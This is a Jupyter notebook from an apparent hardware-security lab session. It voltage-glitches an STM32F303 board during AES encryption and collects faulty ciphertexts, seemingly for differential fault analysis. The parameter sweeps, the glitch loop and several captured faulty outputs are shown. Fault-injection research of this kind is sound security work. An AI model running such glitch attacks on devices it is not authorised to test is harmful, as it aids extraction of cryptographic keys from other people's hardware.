In [1]:
from power_shorter import *
import time
import serial
import faultviz
import random


In [2]:
ps_dev = PowerShorter("/dev/tty.usbserial-11310")

In [3]:
ps_dev.relay(RELAY.RELAY2,1)
time.sleep(1)
ps_dev.relay(RELAY.RELAY2,0)
time.sleep(1)

In [4]:
#ps_dev.gpio(GPIO.GPIO1, 0)
#time.sleep(1)
#ps_dev.gpio(GPIO.GPIO1, 1)

def restart():
    ps_dev.relay(RELAY.RELAY2,1)
    time.sleep(1)
    ps_dev.relay(RELAY.RELAY2,0)
    time.sleep(1)
    

In [5]:
faultviz.start_view_service(port=12345) 

# Starting io.deephaven.python.server.EmbeddedServer
deephaven.cacheDir=/Users/pengyi/Library/Caches/io.Deephaven-Data-Labs.deephaven
deephaven.configDir=/Users/pengyi/Library/Application Support/io.Deephaven-Data-Labs.deephaven
deephaven.dataDir=/Users/pengyi/Library/Application Support/io.Deephaven-Data-Labs.deephaven
# io.deephaven.internal.log.LoggerFactoryServiceLoaderImpl: searching for 'io.deephaven.internal.log.LoggerFactory'...
# io.deephaven.internal.log.LoggerFactoryServiceLoaderImpl: found 'io.deephaven.internal.log.LoggerFactorySlf4j'
Server started on port 12345


In [6]:
vt = faultviz.ViewWidget()

In [7]:
ser = serial.Serial('/dev/tty.usbmodem11202', 38400, parity=serial.PARITY_EVEN, timeout=0.5)

In [8]:
def stm32_F303_attack():
#    ps_dev.gpio(GPIO.GPIO1, 0)
#    time.sleep(1)
#    ps_dev.gpio(GPIO.GPIO1, 1)
#    glitch_delay = random.randint(430000, 435000)
#    glitch_delay = random.randint(435000, 440000)
#    glitch_delay = random.randint(435600, 443800)
#    glitch_delay = random.randint(438000, 443000)
#    glitch_delay = random.randint(440000, 445000)
#    glitch_delay = random.randint(435600, 442400)
#    glitch_delay = random.randint(440000, 450000)
#    glitch_delay = random.randint(430000, 450000)
    glitch_delay = random.randint(435000, 445000)


#    glitch_pulse = random.randint(8, 9)
    glitch_pulse = random.randint(30, 32)
   
    ps_dev.engine_cfg(Engine.E1, [(0, glitch_delay), (1, glitch_pulse), (0, 1)])    # 设置毛刺
   # s.write(b'\x7f')
   # res1 = s.readall().hex()
    
    ps_dev.arm(Engine.E1)
    time.sleep(0.2)
    ser.reset_input_buffer()   # 清空串口缓冲区
    ser.write(b'AES\n')        # 发送 AES 执行加密运算
    line = ser.read(32)        # 获取 AES 加密结果
    
    try:
        c = bytes.fromhex(line.decode())
        s = ps_dev.state(Engine.E1)
        if s == "glitched":
#            if dfaaes.DfaAESSubFunctions.check_fault_pair(c_correct, c) == 9:  # 检查是否是需要的错误密文
            if line == b'':
                restart()          
            if line != b'539ba31a988912a8bd8cec9331477402' and line != b'':
                print("wrong AES output is",line)
                status = "SUCCESS"
                vt.update(state = status, delay = glitch_delay, pulse = glitch_pulse, result = c.hex())

            else:
                status = "NORMAL"
#                print("Normal !!！")
                vt.update(state = status, delay = glitch_delay, pulse = glitch_pulse, result = c.hex())
#        print("end of if !!！")

    except:
        restart()
        print("error!!!")

In [9]:
stm32_F303_attack()

In [10]:
#restart()

In [11]:
attackflag = 1
while(attackflag):
    stm32_F303_attack()

wrong AES output is b'53e8a31a318912a8bd8cec2c31473302'
wrong AES output is b'b29ba31a988912a8bd8c1193318c7402'
wrong AES output is b'536df21a1ecc12a8978cec303147373b'
wrong AES output is b'539ba38d988997a8bde3ec93c7477402'
wrong AES output is b'd39ba31a98891205bd8c369331ae7402'


error: (6, 'Device not configured')

In [19]:
vt.show()

DeephavenWidget(height=150, iframe_url='http://localhost:12345/iframe/table/?name=_0f9b4eb6_acaf_4165_8622_f48…

DeephavenWidget(height=600, iframe_url='http://localhost:12345/iframe/table/?name=_0c4a68d9_3502_4c1b_a1ad_51e…